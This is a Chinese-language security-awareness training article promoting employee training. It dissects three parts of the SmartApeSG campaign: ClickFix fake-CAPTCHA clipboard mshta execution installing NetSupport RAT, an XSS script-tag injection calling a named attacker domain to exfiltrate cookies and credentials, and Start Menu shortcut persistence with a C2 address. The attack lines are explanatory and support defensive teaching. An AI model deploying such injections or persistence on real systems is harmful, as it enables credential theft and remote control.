头脑风暴·案例想象
当我们打开浏览器,想要查找一篇技术博客,页面却弹出“请验证您是人类”的对话框;当我们在公司内部系统里复制一段代码,剪贴板里却莫名其妙出现了mshta ...的指令;当我们以为系统已经清理干净,却在启动菜单里发现一个陌生的快捷方式,暗暗埋伏的恶意程序正悄然等待指令……这些看似“科幻剧本”般的情节,正是当前网络攻击者用来侵蚀企业防线的真实写照。下面,我将通过 三个典型且具有深刻教育意义的安全事件,从技术细节、攻击链路到防御失误进行全景式剖析,帮助大家在信息化、数字化、智能化的浪潮中,树立“未雨绸缪、以身作则”的安全理念。
案例一:ClickFix 伪验证码诱导执行 mshta,瞬间挂载 NetSupport RAT
事件概述
2024 年 6 月首次被安全社区报导的 SmartApeSG(又名 ZPHP、HANEYMANEY)攻击活动,最初通过伪装成浏览器更新页面进行钓鱼。2025 年 11 月,该团伙升级手法,改用 ClickFix——一种伪装成 “验证您是人类” 的 CAPTCHA 页面。受害者在页面上勾选“我是人类”后,系统会自动将一段 mshta 命令写入剪贴板;随后弹出提示,要求用户打开 Win+R,粘贴并执行此命令。该命令会利用 mshta.exe 拉取远程恶意脚本,最终在受害机器上安装 NetSupport RAT(远控木马)并保持持久化。
攻击链路拆解
- 入口:攻击者通过 Web 服务器漏洞或供应链植入恶意脚本(
buf.js)至合法站点。 - 触发:当访问者满足特定条件(如访问频次、IP 区段或时间段),隐藏脚本动态生成 ClickFix 页面。
- 诱导:页面利用社会工程学巧妙设计的 UI,迫使用户点击验证码。
- 执行:脚本向剪贴板写入
mshta "javascript:..."的恶意指令;随后弹窗指引用户手动运行。 - 下载:
mshta通过 HTTPS 下载bof.js(伪装的 CAPCHA 页面)以及sibhl.php,后者是实际的下载器。 - 持久化:恶意程序压缩为
4nnjson.zip,解压后在C:\ProgramData\目录落地,并创建 Start Menu 快捷方式指向AppData\Local\Temp\xxxx.js,实现开机自启。
教训与警示
- 剪贴板劫持:剪贴板不应被随意写入或读取,尤其是涉及系统命令。
- 用户交互式执行:任何需要手动复制粘贴并执行的指令,都应视为潜在风险。
- 伪装 UI:攻击者利用人类对“安全验证”的信任,制造 “必须完成” 的错觉。
防御建议:在企业终端启用 剪贴板监控 或限制
mshta.exe的网络访问;通过安全教育让员工认识到 “不轻信弹窗、不要随意执行粘贴内容”。
案例二:隐藏脚本注入导致跨站脚本(XSS)和信息泄露
事件概述
SmartApeSG 的攻击链始于对 第三方网站 的脚本注入。攻击者利用 XSS 漏洞,在页面中植入 buf.js,该脚本具备 信息收集、键盘记录、剪贴板监听 等功能。一旦受害者访问被污染的页面,脚本即在背后悄悄运行,收集包括登录凭据、浏览记录甚至内部系统 URL 在内的敏感信息,并通过加密通道回传至 frostshiledr.com 控制服务器。
攻击链路拆解
- 漏洞利用:攻击者在目标站点的搜索框或评论区注入
<script src="https://frostshiledr.com/xss/buf.js"></script>。 - 脚本执行:受害者访问页面后,浏览器自动执行远程脚本。
- 信息窃取:脚本监听
document.cookie、window.location、input事件,获取登录会话、内部系统 URL。 - 数据外泄:通过
fetch或XMLHttpRequest将收集的数据 POST 到https://frostshiledr.com/xss/collect.php。 - 后续利用:收集的凭据用于进一步渗透内部系统,甚至加速后续 RAT 的布置。
教训与警示
- XSS 防护:输入过滤、内容安全策略(CSP)是阻断此类攻击的关键。
- 第三方资源审计:企业在使用外部库或 CDN 时,需核实其完整性(如 SRI)并定期检查。
- 最小化信任:不应盲目信任任何页面的脚本运行环境,尤其是来自未知域名的资源。
防御建议:对所有 Web 应用实施 WAF(Web 应用防火墙),并开启 CSP 限制外部脚本。内部员工使用公司内部系统时,务必通过 VPN、双因素认证 并保持系统补丁最新。
案例三:Start Menu 快捷方式持久化——“看不见的后门”
事件概述
在前两个案例的基础上,SmartApeSG 通过 Start Menu 快捷方式实现 长期持久化。恶意代码在 C:\ProgramData\psrookk11nn.zip 中解压后,将 NetSupport RAT 可执行文件放置于 C:\ProgramData\,并在 开始菜单 生成名为 “系统工具” 的快捷方式,指向 AppData\Local\Temp\xxxx.js。该 .js 文件在每次用户登录时被执行,重新启动 RAT 并保持与 C2 服务器(IP:194.180.191.121) 的加密通信。
攻击链路拆解
- 解压与落地:
4nnjson.zip解压后,将 RAT 主体放在ProgramData,隐藏于系统关键目录。 - 快捷方式创建:使用
WScript.Shell对象创建.lnk,目标指向Temp目录下的脚本。 - 开机自启:系统启动时,Start Menu 自动加载所有快捷方式,导致恶意脚本被执行。
- C2 通信:RAT 与远程服务器建立 TLS 隧道(端口 443),进行指令下发、数据回传。
5 抗删减:即使Temp中的脚本被删除,快捷方式仍然指向原路径,系统每次尝试执行时会产生错误日志,进一步暴露痕迹。
教训与警示
- 持久化审计:快捷方式是一种常被忽视的持久化手段,安全团队应定期审计
Start Menu、Run、Scheduled Tasks等启动路径。 - 文件完整性监控:对关键目录(如
ProgramData、AppData)启用 文件哈希校验,及时发现异常文件。 - 最小特权原则:普通用户不应拥有创建系统级快捷方式的权限,需通过组策略进行限制。
防御建议:利用 PowerShell 脚本定期列举
*.lnk文件并比对其目标路径;对ProgramData、Temp目录设置 ACL,仅允许系统账户写入。
从案例走向全局:在数字化、智能化时代筑牢安全防线
信息化、数字化、智能化的“三位一体”

- 信息化:企业业务流程、协同办公、邮件、文件共享等全部迁移至云端或内部信息系统。
- 数字化:大数据、BI、ERP 等系统通过 API 深度集成,业务数据流动跨部门、跨系统。
- 智能化:AI 辅助决策、机器学习模型、自动化运维(RPA)等,引入了 算法即代码 的新风险面。
在这样复合的技术生态里,安全边界被不断模糊。攻击者不再仅凭“技术漏洞”,更借助 社会工程学、供应链渗透、零日攻击等手段,直接针对 人 —— 也就是我们每一位使用终端的员工。
正如《孙子兵法》所云:“兵者,诡道也。”防守者若只固守技术堤坝,而忽视“诡道”之源——人心与行为,终将被攻破。
信息安全意识培训的价值定位
- 根本防线:技术防御只能降低已知风险,人 的认知提升才能阻止 “未知” 的攻击入口。
- 风险感知:通过案例复盘,使员工认识到“点击即中招”、 “粘贴即执行” 的真实危害,提升风险感知。
- 行为养成:让安全理念渗透到日常操作,如“不随意复制粘贴、不轻点弹窗、定期检查快捷方式”。
- 组织文化:安全不再是 IT 部门的专属职责,而是全员共建的企业文化。
培训活动的整体规划(建议框架)
| 环节 | 内容 | 目标 | 关键要点 |
|---|---|---|---|
| 预热 | 发布安全警示海报、邮件简报、内部社交平台互动 | 提升关注度 | 引入案例片段、趣味问答 |
| 理论 | 信息安全基本概念、攻击手法(Phishing、XSS、RAT 持久化) | 夯实基础 | 结合案例图示、流程图 |
| 实践 | 演练脚本检测、漏洞复现、快捷方式审计 | 动手能力 | 使用 PowerShell、Wireshark、URLscan |
| 情景模拟 | 红蓝对抗游戏(模拟 ClickFix 诱导) | 场景感受 | 角色扮演、实时反馈 |
| 复盘 | 案例复盘、常见错误归纳、最佳实践分享 | 形成闭环 | 课堂讨论、形成 SOP(标准作业流程) |
| 考核 | 线上测评、实战任务 | 检验成效 | 设立激励机制(证书、积分) |
| 持续 | 每月安全简报、定期钓鱼演练、内部漏洞通报 | 长效维稳 | 建立安全社区、鼓励举报 |
一句话总结:安全是一场没有终点的马拉松,每一次训练 都是下一次冲刺的加速器。
结语:以“防患未然”之心,携手共筑数字安全长城
在信息化的浪潮中,“技术是一把双刃剑,安全是一面镜子”。我们看到的 SmartApeSG 案例,正是攻击者把技术手段与人性弱点结合的典型写照;而我们每一位职工的认知提升,就是阻断这把刀锋的最佳盾牌。
- 认清风险:理解攻击链的每一步,知道哪里可能被“诱骗”。
- 强化防御:在操作系统、浏览器、办公软件中落实最小特权、剪贴板监控、快捷方式审计等技术措施。
- 培养习惯:不随意复制粘贴、不轻信弹窗、不在未确认安全的链接上点击。
- 积极参与:本公司即将启动的 信息安全意识培训,涵盖理论与实战,是一次提升自我防护能力、为组织筑起安全防线的绝佳机会。请大家踊跃报名,携手打造“人人是防线、人人是守护者”的安全新局面。
让我们以史为鉴,以技为盾,以“未雨绸缪”的姿态,在数字化、智能化的未来里,守护企业的每一份数据、每一寸资产、每一位同事的安全。
“防微杜渐,方能稳如泰山。”——让安全意识从字里行间,落到每一次点击、每一次复制、每一次登录的实际行动中。
共勉!
信息安全意识培训组

2025年11月13日
我们在信息安全意识培训领域的经验丰富,可以为客户提供定制化的解决方案。无论是初级还是高级阶段的员工,我们都能为其提供适合其水平和需求的安全知识。愿意了解更多的客户欢迎随时与我们联系。
- 电话:0871-67122372
- 微信、手机:18206751343
- 邮件:info@securemymind.com
- QQ: 1767022898
